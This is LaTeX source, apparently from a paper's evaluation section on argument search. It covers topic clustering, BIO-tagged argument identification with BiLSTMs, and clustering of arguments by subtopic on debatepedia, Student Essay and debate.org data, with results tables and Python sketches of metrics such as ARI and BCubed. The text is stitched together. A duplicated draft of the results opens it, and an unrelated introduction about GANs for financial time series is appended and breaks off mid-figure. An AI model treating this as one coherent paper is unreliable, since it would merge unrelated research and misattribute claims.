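The effect of combining keyword matching with precomputed clusters can be illustrated with a toy sketch (the substring-based keyword match and the function name are simplifications of ours, not the system's retrieval code):

```python
def cluster_search(query, docs, cluster_of):
    """Retrieve documents via keyword match, then expand the result to all
    documents sharing a cluster with a hit, so that documents using only
    related vocabulary are also returned.

    cluster_of[i] is the precomputed topic cluster id of docs[i].
    """
    terms = query.lower().split()
    hits = {i for i, d in enumerate(docs) if any(t in d.lower() for t in terms)}
    hit_clusters = {cluster_of[i] for i in hits}
    return sorted(i for i in range(len(docs)) if cluster_of[i] in hit_clusters)
```

A pure keyword search for \emph{gay adoption} would miss a document that only speaks of \emph{homosexual parenting}; the cluster expansion recovers it as long as it shares a topic cluster with an explicit match.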
\subsubsection{Argument Identification}
\label{sec:Results:SEG}
The results of the argument identification step based on the \emph{Student Essay} data set are given in Table \ref{tab:Results:Segmentation}. We evaluate a BiLSTM model in a sequence-labeling setting against a feedforward neural network (FNN) in a classification setting in order to investigate the importance of context for the identification of arguments. Using the BiLSTM improves the macro $F_1$ score relative to the feedforward neural network by 3.9\% on the \emph{bert-avg} embeddings and by 15.2\% on the \emph{bert-cls} embeddings. Furthermore, we evaluate the effects of using the sentence embeddings \emph{bert-avg} and \emph{bert-cls}.
Using \emph{bert-cls} embeddings increases the macro $F_1$ score by 4.3\% in the classification setting and by 15.6\% in the sequence-learning setting relative to using \emph{bert-avg}. Considering both the sequence-learning and classification results, we conclude that the \emph{bert-cls} embeddings encode important additional information which is only utilized in a sequence-learning setting.
Our results also reflect a peculiarity of the \emph{Student Essay} training data: most sentences are part of an argument, and only $\sim$3\% of the sentences are labeled as outside (`O'). Accordingly, the models observe hardly any examples of outside sentences during training and thus have difficulties learning to distinguish them from other sentences, which is reflected by the very low precision and recall for the class `O'. Since the correct identification of a `B' sentence alone already suffices to separate two arguments from each other, labeling a sentence as `O' only serves to classify it as non-argumentative. In the case of the \emph{Student Essay} data set, separating two arguments from each other is thus much more important than separating non-argumentative sentences from arguments. The last column of Table \ref{tab:Results:Segmentation} therefore reports the macro $F_1$ score only for the `B' and `I' labels, with a score of 0.956 for our best model, reflecting the model's high ability to separate arguments from each other.
Furthermore, we evaluate whether the previously best-performing model $BILSTM_{cls}^{bert}$ is able to identify arguments on the \emph{debate.org} data set if trained on the \emph{Student Essay} data set. The results are given in Table \ref{tab:Results:SegORG}.
The pretrained model performs very poorly on \emph{`O'} sentences since only few examples of \emph{`O'} sentences were observed during training. Moreover, applying the pretrained $BILSTM_{cls}^{bert}$ to the \emph{debate.org} data set yields very low precision and recall on \emph{`B'} sentences. In contrast to the \emph{Student Essay} data set, where arguments often begin with cue words (e.g., \emph{first}, \emph{second}, \emph{however}), the documents in the \emph{debate.org} data set use cue words less often, impacting the classification performance.
The results of training the $BILSTM_{cls}^{bert}$ model from scratch on the \emph{debate.org} data set differ considerably from our results on the \emph{Student Essay} data set. As shown in Table \ref{tab:Results:CM}, the confusion matrix for the \emph{debate.org} data set shows that the BiLSTM model has difficulties learning which sentences start an argument in this data set. In contrast to the \emph{Student Essay} data set, it cannot exploit peculiarities such as cue words and apparently fails to find other indications for \emph{`B'} sentences. In addition, the distinction between \emph{`I'} and \emph{`O'} sentences is not clear either. These results match our experience from annotating documents in the \emph{debate.org} data set, where it was often difficult to decide whether a sentence forms an argument and to which argument it belongs. This is also reflected by the inter-annotator agreement of 0.24 based on Krippendorff's $\alpha$ on a subset of 20 documents with three annotators.
Overall, we find that the performance of the argument identification strongly depends on the peculiarities and quality of the underlying data set. For well-curated data sets such as the \emph{Student Essay} data set, the information contained in the current sentence as well as the surrounding sentences yields an accurate identification of arguments. In contrast, data sets with poor structure or colloquial language, such as the \emph{debate.org} data set, lead to less accurate results.
\subsubsection{Argument Clustering}
\label{sec:Results:AS}
In the final step of the argument search framework, we evaluate the argument clustering according to topical aspects based on the \emph{debatepedia} data set. To this end, we compare the clustering algorithms HDBSCAN and k-means on the document embeddings that yielded the best results in the topic clustering step of our framework; as described in Section~\ref{sec:Evaluation:Methods}, the parameter $k$ for k-means is estimated per topic via a linear regression. As shown in Table \ref{tab:Results:ASUnsupervised}, we perform the clustering based on the arguments in each ground-truth topic separately and average the results across the topics. We observe that HDBSCAN performs best on tf-idf embeddings with an averaged $ARI$ score of 0.085, while k-means achieves its best performance on \emph{bert-avg} embeddings with an averaged $ARI$ score of 0.065. Using HDBSCAN instead of k-means on tf-idf embeddings yields an improvement in the $ARI$ score of 2.7\%. Using k-means instead of HDBSCAN on \emph{bert-avg} and \emph{bert-cls} embeddings results in improvements of 4.7\% and 2.8\%, respectively.
Applying a UMAP dimensionality reduction step before HDBSCAN outperforms k-means on \emph{bert-avg} embeddings with an $ARI$ score of 0.069. On tf-idf embeddings, however, the UMAP step slightly reduces the performance. Comparing \emph{bert-cls} with \emph{bert-avg} embeddings, we find that \emph{bert-avg} embeddings result in slightly better scores, with a maximum improvement of 2.1\%. We further compare calculating tf-idf vectors only within each topic to computing them based on all arguments in the whole data set (\emph{across topics}). This change only affects the document frequencies used to calculate the tf-idf scores: terms that are characteristic for a given topic show higher document frequencies and thus lower tf-idf scores when the computation is performed within each topic. Since tf-idf scores indicate the relevance of each term, the clustering algorithms then focus more on the terms that distinguish the arguments within a topic from each other.
Accordingly, the observed deviation of the $ARI$ score by 0.9\% for k-means and 6.1\% for HDBSCAN in combination with UMAP matches our expectation.
We also evaluated the exclusion of the HDBSCAN noise clusters (\emph{without noise}) yielding an $ARI$ score of 0.140 and a $BCubed~F_1$ score of 0.439.
Furthermore, we show in Table \ref{tab:Results:BestTopics} for the best performing k-means and HDBSCAN models the topics with the highest $ARI$ scores. We observe that the clustering performance on topics with the best clustering performance is still relative low, in particular when compared to the results of the topic clustering step. As indicated by decreasing $ARI$ scores, both models have only a few topics where they perform comparatively well.
Figure~\ref{fig:Results:Scatterplot} shows the performance of the two models with respect to the number of arguments in each topic. Both $ARI$ and $BCubed~F_1$ scores show a very similar distribution for topics with different numbers of arguments, while the distributions of the homogeneity score show a slight difference for the two models. This indicates that the performance of the clustering algorithms does not depend on the number of arguments.
Moreover, the upper histogram in Figure \ref{fig:Results:Hist} displays the distribution of the degree of consensus between the two models based on the $ARI$ scores for each topic. Comparing this with the distribution of the $ARI$ score computed between the HDBSCAN model and the ground-truth displayed on the histogram below, we observe that the consensus between the two models is, for most topics, rather low.
Overall, our results show the difficulties of argument clustering based on topical aspects.
Based on the \emph{debatepedia} data set, we show that unsupervised clustering algorithm with the proposed embedding methods cannot cluster arguments into topical aspects in a consistent and reasonable way. This result is in line with the results of Reimers et al.~\cite{Reimers2019} stating that even experts have difficulties to identify argument similarity based on topical aspects.
Considering that their evaluation is based on sentence-level arguments, it seems likely that assessing argument similarity is even harder for arguments comprised of one or multiple sentences.
Moreover, the authors report promising results for the pairwise assessment of argument similarity when using the output corresponding to the BERT $[CLS]$ token.
However, our experiments show that their findings do not apply to \emph{debatepedia} data set. We assume that this is due to differences in argument similarity that are introduced by using prevalent topics in the \emph{debatepedia} data set rather than using explicitly annotated arguments.
\fi
\subsection{Evaluation Results}
\label{sec:Results}
In the following, we present the results for the three tasks topic clustering, argument identification, and argument clustering.
\subsubsection{Topic Clustering}
\label{sec:Results:DS}
We start with the results of clustering the documents by topics based on
the \emph{debatepedia} data set with 170 topics (see Table \ref{tab:Results:ClusteringUnsupervised}). The plain model $ARGMAX_{none}^{tfidf}$, which computes clusters based on words with the highest tf-idf score within a document, achieves an $ARI$ score of $0.470$. This indicates that many topics in the \emph{debatepedia} data set can already be represented by a single word. Considering the $ARGMAX_{lsa}^{tfidf}$ model, the $ARI$ score of $0.368$ shows that using the topics found by LSA does not add value compared to tf-idf.
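The plain $ARGMAX_{none}^{tfidf}$ model admits a very compact implementation: each document is assigned to a pseudo-cluster named after its highest-scoring tf-idf term, so documents sharing the same most characteristic word end up in the same topic cluster. The following pure-Python sketch illustrates the idea (the whitespace tokenization and the smoothed idf weighting are our illustrative assumptions, not necessarily the exact implementation used here):

```python
import math
from collections import Counter

def argmax_tfidf_clusters(documents):
    """Assign each document to a cluster named after its top tf-idf term."""
    tokenized = [doc.lower().split() for doc in documents]
    n_docs = len(tokenized)
    # document frequency: in how many documents each term occurs
    df = Counter(term for tokens in tokenized for term in set(tokens))
    clusters = []
    for tokens in tokenized:
        tf = Counter(tokens)
        scores = {t: (tf[t] / len(tokens))
                     * math.log((1 + n_docs) / (1 + df[t]))  # smoothed idf
                  for t in tf}
        clusters.append(max(scores, key=scores.get))
    return clusters
```

Terms occurring in every document receive an idf of zero, so the argmax picks a term that is characteristic for the document, which is why this single-word heuristic can already perform reasonably on topics that are well described by one term.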
Furthermore, we
find that the tf-idf-based
$HDBSCAN_{lsa + umap}^{tfidf}$ and $KMEANS_{none}^{tfidf}$ achieve a comparable performance given the $ARI$ scores of $0.694$ and $0.703$. However, since HDBSCAN accounts for noise in the data which it pools within a single cluster, the five rightmost columns of Table \ref{tab:Results:ClusteringUnsupervised} need to be considered when deciding on a clustering method for further use. When excluding the noise cluster from the evaluation,
the $ARI$ score increases considerably for all $HDBSCAN$ models ($HDBSCAN_{none}^{tfidf}$: $0.815$, $HDBSCAN_{umap}^{tfidf}$: $0.779$, $HDBSCAN_{lsa+umap}^{tfidf}$: $0.775$). Considering that $HDBSCAN_{none}^{tfidf}$ identifies 21.1\% of the instances as noise, compared to the 4.3\%
in case of $HDBSCAN_{umap}^{tfidf}$, we conclude that applying a UMAP dimensionality reduction step before the HDBSCAN clustering is clearly beneficial for the performance (at least for the \emph{debatepedia} data set).
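The $ARI$ scores used throughout this evaluation follow the standard adjusted Rand index. For reference, a self-contained sketch computed from the pair-counting contingency table (equivalent to the usual library implementations, e.g. scikit-learn's \texttt{adjusted\_rand\_score}):

```python
from collections import Counter
from math import comb

def adjusted_rand_index(labels_true, labels_pred):
    """Adjusted Rand index from the pair-counting contingency table."""
    n = len(labels_true)
    contingency = Counter(zip(labels_true, labels_pred))
    sum_ij = sum(comb(c, 2) for c in contingency.values())   # agreeing pairs
    sum_a = sum(comb(c, 2) for c in Counter(labels_true).values())
    sum_b = sum(comb(c, 2) for c in Counter(labels_pred).values())
    expected = sum_a * sum_b / comb(n, 2)    # chance-level agreement
    max_index = (sum_a + sum_b) / 2
    return (sum_ij - expected) / (max_index - expected)
```

An $ARI$ of $1$ indicates a perfect match up to relabeling, $0$ indicates chance-level agreement, and negative values indicate worse-than-chance clusterings.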
\begin{table*}[tb]
\centering
\caption{Results of argument identification on the \emph{Student Essay} data set.
}
\label{tab:Results:Segmentation}
\begin{small}
\begin{tabular}{@{}l cc cc cc ccc@{}}
\toprule
& \multicolumn{2}{c}{\emph{B}}& \multicolumn{2}{c}{\emph{I}}& \multicolumn{2}{c}{\emph{O}}& \multicolumn{2}{r}{}\\ \cline{2-3} \cline{4-5} \cline{6-7}
& $Prec.$ & $Rec.$
& $Prec.$ & $Rec.$
& $Prec.$ & $Rec.$
&$F_{1, macro}$ & $F_{1, weighted}$ &$F_{1, macro}^{B, I}$ \\
\midrule
majority class
& 0.000 & 0.000
& 0.719 & 1.000
& 0.000 & 0.000
& 0.279 & 0.602 & 0.419\\
$FNN_{avg}^{bert}$
& 0.535 & 0.513
& 0.820 & 0.836
& 0.200 & 0.160
& 0.510 & 0.736 & 0.675\\
$FNN_{cls}^{bert}$
& 0.705 & 0.593
& 0.849 & 0.916
& \textbf{0.400} & 0.080
& 0.553 & 0.805 & 0.763\\
$BILSTM_{avg}^{bert}$
& 0.766 & 0.713
& 0.885 & 0.930
& 0.000 & 0.000
& 0.549 & 0.846 & 0.823 \\
$BILSTM_{cls}^{bert}$
& \textbf{0.959} & \textbf{0.914}
& \textbf{0.967} & \textbf{0.985}
& 0.208 & \textbf{0.200}
& \textbf{0.705} & \textbf{ 0.951} & \textbf{0.956} \\
\bottomrule
\end{tabular}
\end{small}
\end{table*}
\begin{table*}[tb]
\centering
\caption{Argument identification results on the \emph{debate.org} data set; model trained on \emph{Student Essay} and \emph{debate.org}.}
\label{tab:Results:SegORG}
\begin{small}
\begin{tabular}{@{}ll cc cc cc cc@{}}
\toprule
& & \multicolumn{2}{c}{\emph{B}}& \multicolumn{2}{c}{\emph{I}}& \multicolumn{2}{c}{\emph{O}}& \multicolumn{2}{r}{}\\
\cline{3-8}
&\emph{trained on}
& $Prec.$ & $Rec.$
& $Prec.$ & $Rec.$
& $Prec.$ & $Rec.$
&$F_{1, macro}$ & $F_{1, weighted}$ \\
\midrule
$BILSTM_{cls}^{bert}$ & \emph{Student Essay}
& 0.192 & 0.312
& 0.640 & 0.904
& 1.000 & 0.015
& 0.339 & 0.468\\
$BILSTM_{cls}^{bert}$ &\emph{debate.org}
& 1.000 & 0.021
& 0.646 & 0.540
& 0.381 & 0.640
& 0.368 & 0.492\\
\bottomrule
\end{tabular}
\end{small}
\end{table*}
\textbf{Inductive Generalization.}
We apply our unsupervised approaches to the \emph{debate.org} data set to evaluate whether the model is able to generalize. The results, given in Table \ref{tab:Results:ClusteringUnsupervisedORG}, show that
k-means performs distinctly better on the \emph{debate.org} data set than HDBSCAN (ARI: $0.436$ vs. $0.354$ and $0.330$; $F_1$: $0.644$ vs. $0.479$ and $0.520$). This is likely because the \emph{debate.org} data set is characterized by a high number of single-element topics. In contrast to k-means, HDBSCAN does not allow single-element clusters, so these instances are pooled into a single noise cluster. This is reflected by the different numbers of clusters as well as the lower homogeneity scores of HDBSCAN (0.633 and 0.689, compared to 0.822 for k-means) at a comparable completeness of approx. 0.8.
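The homogeneity and completeness scores discussed above are the entropy-based measures of the V-measure family: homogeneity penalizes clusters that mix several ground-truth topics, completeness penalizes topics that are split across clusters. A pure-Python sketch of their definitions:

```python
from collections import Counter
from math import log

def _entropy(labels):
    n = len(labels)
    return -sum(c / n * log(c / n) for c in Counter(labels).values())

def _conditional_entropy(labels, given):
    """H(labels | given), computed from the joint distribution."""
    n = len(labels)
    joint = Counter(zip(given, labels))
    marg = Counter(given)
    # p(g, l) * log(p(g, l) / p(g)) summed over joint outcomes
    return -sum(c / n * log(c / marg[g]) for (g, _), c in joint.items())

def homogeneity_completeness(labels_true, labels_pred):
    h_c, h_k = _entropy(labels_true), _entropy(labels_pred)
    homogeneity = 1.0 if h_c == 0 else 1.0 - _conditional_entropy(labels_true, labels_pred) / h_c
    completeness = 1.0 if h_k == 0 else 1.0 - _conditional_entropy(labels_pred, labels_true) / h_k
    return homogeneity, completeness
```

Pooling many single-element topics into one noise cluster leaves completeness largely intact but hurts homogeneity, which matches the pattern observed for HDBSCAN above.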
\textbf{Qualitative Evaluation.}
Applying a keyword search would retrieve only a subset of the relevant arguments that mention the search phrase explicitly. Combining a keyword search on documents with the computed clusters
enables an argument search framework to retrieve arguments from a broader set of documents. For example,
for \textit{debatepedia.org}, we observe that clusters of arguments related to \emph{gay adoption} include words like \emph{parents}, \emph{mother}, \emph{father}, \emph{sexuality}, \emph{heterosexual}, and \emph{homosexual} while neither \emph{gay} nor \emph{adoption} are mentioned explicitly.
\subsubsection{Argument Identification}
\label{sec:Results:SEG}
The results of the argument identification step based on the \emph{Student Essay} data set are given in Table~\ref{tab:Results:Segmentation}. We evaluate a BiLSTM model in a sequence-labeling setting compared to
majority voting and
a feedforward neural network (FNN) as baselines.
Using the BiLSTM improves the macro $F_1$ score relative to the feedforward neural network on the \emph{bert-avg} embeddings by 3.9\% and on the \emph{bert-cls} embeddings by 15.2\%. Furthermore,
using \emph{bert-cls} embeddings increases the macro $F_1$ score by 4.3\% in the classification setting and by 15.6\% in the sequence-learning setting compared to using \emph{bert-avg}.
\textbf{BIO Tagging.}
We observe a low precision and recall for the class `O'.
This can be traced back to a peculiarity of the \emph{Student Essay} data set: Most sentences in the \emph{Student Essay}'s training data set are part of an argument and only 3\% of the sentences are labeled as non-argumentative (outside/`O'). Accordingly, the models observe hardly any examples of outside sentences during training and, thus, have difficulties in learning to distinguish them from other sentences.
Considering the fact that the correct identification of a `B' sentence alone is already enough to separate two arguments from each other, the purpose of labeling a sentence as `O' is restricted to classifying the respective sentence as non-argumentative. Therefore, in case of the \emph{Student Essay} data set, the task of separating two arguments from each other becomes much more important than separating non-argumentative sentences from arguments. In the last column of Table \ref{tab:Results:Segmentation}, we also show the macro $F_1$ score for the `B' and `I' labels only. The high macro $F_1$ score of 0.956 for the best performing model reflects the model's high ability to separate arguments from each other.
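The role of the BIO labels in separating arguments can be made concrete with a small decoding routine: a `B' always opens a new argument, `I' continues the current one, and `O' closes it. The sketch below treats an `I' without a preceding `B' as opening an argument, a common lenient decoding choice and our assumption here:

```python
def bio_to_spans(labels):
    """Decode sentence-level BIO labels into argument spans (start, end), inclusive."""
    spans, start = [], None
    for i, label in enumerate(labels):
        if label == "B":                    # always opens a new argument
            if start is not None:
                spans.append((start, i - 1))
            start = i
        elif label == "I":                  # continues (or leniently opens) one
            if start is None:
                start = i
        else:                               # 'O': non-argumentative sentence
            if start is not None:
                spans.append((start, i - 1))
                start = None
    if start is not None:
        spans.append((start, len(labels) - 1))
    return spans
```

As the decoding shows, a correctly predicted `B' alone suffices to split two adjacent arguments, which is why the $F_{1, macro}^{B, I}$ score restricted to `B' and `I' is the relevant quantity for argument separation.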
\begin{table}
\centering
\caption{Confusion matrices of $BILSTM_{cls}^{bert}$ (rows: ground-truth labels; columns: predictions).}
\label{tab:Results:CM}
\begin{footnotesize}
\begin{tabular}{c| ccc}
\multicolumn{4}{c}{Student Essay} \\
& B & I & O\\
\midrule
B&15 & 33 & 0\\
I&24 & 226 & 0 \\
O&39 & 94 & 2\\
\bottomrule
\end{tabular}
\hspace{1cm}
\begin{tabular}{c| ccc}
\multicolumn{4}{c}{debate.org} \\
& B & I & O\\
\midrule
B&1 & 24 & 23\\
I&0 & 135 & 115 \\
O&0 & 50 & 85\\
\bottomrule
\end{tabular}
\end{footnotesize}
\end{table}
\begin{table*}[tb]
\centering
\caption{Results of the clustering of arguments of the \emph{debatepedia} data set by topical aspects. \emph{across topics}:~tf-idf scores are computed across topics, \emph{without noise}:~{HDBSCAN} is only evaluated on instances not classified as noise.}
\label{tab:Results:ASUnsupervised}
\begin{small}
\begin{tabular}{@{}l l l cccc l@{}}
\toprule
Embedding & Algorithm & Dim. Reduction & $ARI$ & $Ho$ &$Co$ & $BCubed~F_1$ & Remark\\
\midrule
tf-idf & HDBSCAN & UMAP & 0.076 & 0.343 &0.366& 0.390 & \\
tf-idf & HDBSCAN & UMAP & 0.015 & 0.285 &0.300& 0.341 &\emph{across topics} \\
tf-idf & HDBSCAN & $-$ & \textbf{0.085} & \textbf{0.371} &\textbf{0.409}& \textbf{0.407} & \\
tf-idf & k-means & $-$ & 0.058 & 0.335 &0.362& 0.397 & \\
tf-idf & k-means & $-$ & 0.049 & 0.314 &0.352& 0.402 &\emph{across topics} \\
\midrule
bert-cls & HDBSCAN & UMAP & 0.030 & 0.280 &0.298& 0.357 & \\
bert-cls & HDBSCAN & $-$ & 0.016 & 0.201 &0.324& 0.378 & \\
bert-cls & k-means & $-$ & 0.044 & 0.332 &0.326& 0.369 & \\
\midrule
bert-avg & HDBSCAN & UMAP & 0.069 & 0.321 &0.352& 0.389 & \\
bert-avg & HDBSCAN & $-$ & 0.018 & 0.170 &0.325& 0.381 & \\
bert-avg & k-means & $-$ & 0.065 & 0.337 &0.349& 0.399 & \\
\midrule
tf-idf & HDBSCAN & $-$ & 0.140 & 0.429 &0.451& 0.439 &\emph{without noise}\\
\bottomrule
\end{tabular}
\end{small}
\end{table*}
\textbf{Generalizability.}
We evaluate whether the
model $BILSTM_{cls}^{bert}$, which performed best on the \emph{Student Essay} data set, is able to identify arguments on the \emph{debate.org} data set if trained on the \emph{Student Essay} data set. The results are given in Table~\ref{tab:Results:SegORG}.
Again, the pretrained model performs poorly on \emph{`O'} sentences since not many examples of \emph{`O'} sentences were observed during training. Moreover, applying the pretrained $BILSTM_{cls}^{bert}$ to the \emph{debate.org} data set yields low precision and recall on \emph{`B'} sentences. A likely reason is that, in contrast to the \emph{Student Essay} data set where arguments often begin with cue words (e.g., \emph{first}, \emph{second}, \emph{however}), the documents in the \emph{debate.org} data set contain cue words less often. %
The results from training the $BILSTM_{cls}^{bert}$ model from scratch on the \emph{debate.org} data set are considerably different from our results on the \emph{Student Essay} data set. As shown in Table \ref{tab:Results:CM}, the confusion matrix for the \emph{debate.org} data set shows that the BiLSTM model has difficulties in learning which sentences start an argument in the \emph{debate.org} data set. In contrast to the \emph{Student Essay} data set, it cannot learn from the peculiarities (e.g., cue words) and apparently fails to find other indications for \emph{`B'} sentences. In addition, the distinction between \emph{`I'} and \emph{`O'} sentences is also unclear. These results match our experiences with the annotation of documents in the \emph{debate.org} data set, where it was often difficult to decide whether a sentence forms an argument and to which argument it belongs. This is also reflected by the inter-annotator agreement of 0.24 based on Krippendorff's $\alpha$ on a subset of 20 documents with three annotators.
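The per-class precision and recall values in Table \ref{tab:Results:SegORG} follow directly from confusion matrices such as those in Table \ref{tab:Results:CM} (rows are ground-truth labels, columns are predictions). The sketch below recovers, for instance, the reported precision of 1.000 and recall of 0.021 for \emph{`B'} on \emph{debate.org}; small deviations for other cells may stem from rounding:

```python
def precision_recall(confusion, labels):
    """Per-class precision/recall; confusion[i][j] = count of true label i predicted as j."""
    stats = {}
    for k, label in enumerate(labels):
        true_pos = confusion[k][k]
        pred_total = sum(row[k] for row in confusion)   # column sum: predicted as k
        true_total = sum(confusion[k])                   # row sum: truly k
        precision = true_pos / pred_total if pred_total else 0.0
        recall = true_pos / true_total if true_total else 0.0
        stats[label] = (precision, recall)
    return stats

# debate.org confusion matrix from Table tab:Results:CM (rows: B, I, O ground truth)
debate_org = [[1, 24, 23],
              [0, 135, 115],
              [0, 50, 85]]
stats = precision_recall(debate_org, ["B", "I", "O"])
```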
\textbf{Bottom Line.} Overall, we find that the performance of the argument identification strongly depends on the peculiarities and quality of the underlying data set. For well curated data sets such as the \emph{Student Essay} data set, the information contained in the current sentence as well as the surrounding sentences yield a considerably accurate identification of arguments. In contrast, data sets with poor structure or colloquial language, as given in the \emph{debate.org} data set, lead to less accurate results.%
\subsubsection{Argument Clustering}
\label{sec:Results:AS}
We now evaluate the argument clustering according to topical aspects (i.e., subtopics) as the final step of the argument search framework,
using the \emph{debatepedia} data set.
We evaluate the performance of the clustering algorithms HDBSCAN and k-means for different
embeddings that yielded the best results in the topic clustering step of our framework.
We perform the clustering of the arguments for each
topic (e.g., \textit{gay marriage}) separately and average the results across the topics. As shown in Table \ref{tab:Results:ASUnsupervised}, we observe that HDBSCAN performs best on tf-idf embeddings with an averaged $ARI$ score of 0.085, while k-means achieves its best performance on \emph{bert-avg} embeddings with an averaged $ARI$ score of 0.065. Using HDBSCAN instead of k-means on tf-idf embeddings yields an improvement in the $ARI$ score of 2.7\%. Using k-means instead of HDBSCAN on \emph{bert-avg} and \emph{bert-cls} embeddings results in slight improvements. %
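The $BCubed~F_1$ score reported in Table \ref{tab:Results:ASUnsupervised} averages item-wise precision and recall computed from the overlap between each item's predicted cluster and its ground-truth category. A compact sketch of the standard definition:

```python
from collections import Counter

def bcubed_f1(labels_true, labels_pred):
    """BCubed F1: harmonic mean of item-averaged precision and recall."""
    n = len(labels_true)
    overlap = Counter(zip(labels_pred, labels_true))  # |cluster ∩ category| per pair
    cluster_size = Counter(labels_pred)
    category_size = Counter(labels_true)
    # per-item precision: share of the item's cluster with the item's category
    precision = sum(overlap[(c, t)] / cluster_size[c]
                    for c, t in zip(labels_pred, labels_true)) / n
    # per-item recall: share of the item's category inside the item's cluster
    recall = sum(overlap[(c, t)] / category_size[t]
                 for c, t in zip(labels_pred, labels_true)) / n
    return 2 * precision * recall / (precision + recall)
```

Unlike $ARI$, BCubed rewards partially correct clusters, which explains why the $BCubed~F_1$ scores in the table stay well above the near-zero $ARI$ scores.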
\textbf{UMAP.} Applying a UMAP dimensionality reduction step before HDBSCAN on \emph{bert-avg} embeddings yields an $ARI$ score of 0.069, thereby outperforming k-means. However, using a UMAP dimensionality reduction step in combination with tf-idf slightly reduces the performance.
We
find that \emph{bert-avg} embeddings result in slightly better scores than \emph{bert-cls} when using UMAP.
\textbf{TF-IDF across Topics.} We further evaluate whether computing tf-idf within each topic separately leads to a better performance than computing tf-idf
across topics in the data set.
The observed slight deviation of the $ARI$ score
for k-means and
HDBSCAN in combination with UMAP matches our expectation that
clustering algorithms focus more on terms which distinguish the arguments from each other within a topic.
\textbf{Excluding Noise.} When excluding the HDBSCAN noise clusters (\emph{without noise}), we obtain an $ARI$ score of 0.140 and a $BCubed~F_1$ score of 0.439.
\textbf{Number of Arguments.} Figure~\ref{fig:Results:Scatterplot} shows the performance of the models HDBSCAN with tf-idf and k-means with \textit{bert-avg} with respect to the number of arguments in each topic. Both $ARI$ and $BCubed~F_1$ scores show a similar distribution for topics with different numbers of arguments, while the distributions of the homogeneity score show a slight difference for the two models. This indicates that the performance of the clustering algorithms does not depend on the number of arguments.
\textbf{Examples.} In Table \ref{tab:Results:BestTopics}, we show for the best performing k-means and HDBSCAN models the topics with the highest $ARI$ scores.
\begin{figure}[tb]
\centering
\includegraphics[width = 0.83\linewidth]{key_results/AS/hdbscan_scatterplot2}
\includegraphics[width = 0.83\linewidth]{key_results/AS/kmeans-bert_scatterplot2}
\caption{Number of arguments in each topic
for HDBSCAN with tf-idf embeddings and k-means with \emph{bert-avg} embeddings.}
\label{fig:Results:Scatterplot}
\end{figure}
\begin{table}[tb]
\centering
\caption{Top 5 topics
using HDBSCAN and k-means.} %
\label{tab:Results:BestTopics}
\begin{small}
\begin{tabular}{p{3.9cm} r@{}r}
\toprule
Topic & \#$Clust._{true}$ & \#$Clust._{pred}$ \\
\toprule
\multicolumn{3}{c}{\textbf{HDBSCAN based on tf-idf embeddings}}\\
\midrule
Rehabilitation vs retribution
&2 &3 \\
Manned mission to Mars
&5 &6 \\
New START Treaty
&5 &4 \\
Obama executive order to raise the debt ceiling
&3 &6 \\
Republika Srpska secession from Bosnia and Herzegovina
&4 &6 \\
\toprule
\multicolumn{3}{c}{\textbf{k-means based on \emph{bert-avg} embeddings}}\\
\midrule
Bush economic stimulus plan
&7 &5 \\
Hydroelectric dams
&11 &10 \\
Full-body scanners at airports
&5 &6 \\
Gene patents
&4 &7 \\
Israeli settlements
&3 &4 \\
\bottomrule
\end{tabular}
\end{small}
\end{table}
\textbf{Bottom Line.}
Overall, our results confirm that argument clustering based on topical aspects is nontrivial and high evaluation results are still hard to achieve in real-world settings.
Given the \emph{debatepedia} data set, we show that our unsupervised clustering algorithms with the different embedding methods do not yet cluster arguments into topical aspects in a highly consistent and reasonable way. This result is in line with the findings of \citet{Reimers2019}, stating that even experts have difficulties in identifying argument similarity based on topical aspects (i.e., subtopics).
Considering that their evaluation is based on sentence-level arguments, it seems likely that assessing argument similarity is even harder for arguments comprised of one or multiple sentences.
Moreover, the authors report promising results for the pairwise assessment of argument similarity when using the output corresponding to the BERT $[CLS]$ token.
However, our experiments show that their findings do not apply to the \emph{debatepedia} data set. We assume that this is due to differences in the argument similarity that are introduced by using prevalent topics in the \emph{debatepedia} data set rather than using explicitly annotated arguments.
\section{Introduction}
\label{sec:Intro}
Generative adversarial networks (GANs) belong to the class of generative models.
The key idea behind GANs \citep{goodfellow2014generative} is to add a discriminator network in order to improve the data generation process. GANs can therefore be viewed as competing games between two neural networks: a generator network and a discriminator network. The generator network attempts to fool the discriminator network by converting random noise into sample data, while the discriminator network tries to identify whether the sample data is fake or real.
This powerful idea behind GANs leads to a versatile class of generative models with a wide range of successful applications from image generation to natural language processing \citep{denton2015deep,radford2015unsupervised, yeh2016semantic, ledig2016others, zhu2016generative, reed2016generative, vondrick2016generating, luc2016semantic, ghosh2016contextual}.\\
Inspired by the success of GANs for computer vision, there is a surge of interest in applying GANs for financial time series data generation. In such a context, the key contributions consist of adapting divergence functions and network architectures in order to cope with the time series nature and the dependence structure of financial data. For example, Quant-GAN \citep{Wiese2019,wiese2020quant} uses a TCN structure, C-Wasserstein GAN \citep{li2020generating} uses the Wasserstein distance as \citep{arjovsky2017wasserstein} and \citep{gulrajani2017improved}, FIN-GAN \citep{takahashi2019modeling} generates synthetic financial data, Corr-GAN
\citep{marti2020corrgan} adapts the DCGAN structure of \citep{radford2015unsupervised} to correlation matrices of asset returns, C-GAN \citep{fu2019time} follows \citep{mirza2014conditional} to simulate realistic conditional scenarios, Sig-Wasserstein-GAN \citep{ni2020conditional} generates orders and transactions, and Tail-GAN \citep{dionelis2020tail} deals with risk management. Furthermore, activities from industrial AI labs such as JP Morgan \citep{storchan2020mas} and American Express \citep{efimov2020using} have further elevated GANs as promising tools for synthetic data generation and for model testing. (See also the reviews by \citep{cao2021generative} and \citep{eckerli2021generative} for more details).\\
Despite this empirical success, there are well-recognized issues in GANs training, including the vanishing gradient when there is an imbalance between the generator and the discriminator training \citep{arjovsky2017towards}, and the mode collapse when the generator learns to produce only a specific range of samples \citep{Salimans2016}. In particular, it is hard to reproduce realistic financial time series due to well-documented stylized facts \citep{chakraborti2011econophysics,cont2001empirical} such as
heavy-tailed-and-skewed distribution of asset returns, volatility clustering, the
leverage effect, and the Zumbach effect \citep{zumbach2001heterogeneous}. For instance, \citep{takahashi2019modeling} shows that batch normalization tends to yield large fluctuations in the generated time series as well as strong auto-correlation. Moreover, Figure \ref{Fig:Plot_loss_generator_acc_discrim_CNNGan} below highlights the difficulty of convergence for GANs when a convolutional neural network is used to generate financial time series: the discriminator does not reach the desired accuracy level of $50\%$ and the generator exhibits a non-vanishing loss. (See Section \ref{sec:Exp} for a detailed description of data sources).
\begin{figure}[h!]
\center
\hspace{-2.cm} (a) Discriminator accuracy \hspace{1.5cm} (b) Generator loss \\
